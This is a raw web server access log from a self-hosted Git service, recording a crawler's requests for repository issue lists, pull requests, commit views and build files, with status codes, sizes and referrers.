git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:19:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 11117] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_monitor_full.spec" -[17/Feb/2026:18:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:19:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10941] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:19:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&state=open&type=all" -[17/Feb/2026:18:19:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/tsconfig.json" -[17/Feb/2026:18:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11899] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/tsconfig.json" -[17/Feb/2026:18:19:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:19:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:19:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:19:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:19:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:19:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" -[17/Feb/2026:18:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.cpp" -[17/Feb/2026:18:19:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_controller.hpp" -[17/Feb/2026:18:19:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 16909] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:18:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13560] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:19:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13560] [Gzip 4.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13510] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=closed&type=all" -[17/Feb/2026:18:19:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:19:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:20:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10044] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:20:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=closed&type=all" -[17/Feb/2026:18:20:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10062] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:20:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:20:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:20:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:20:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 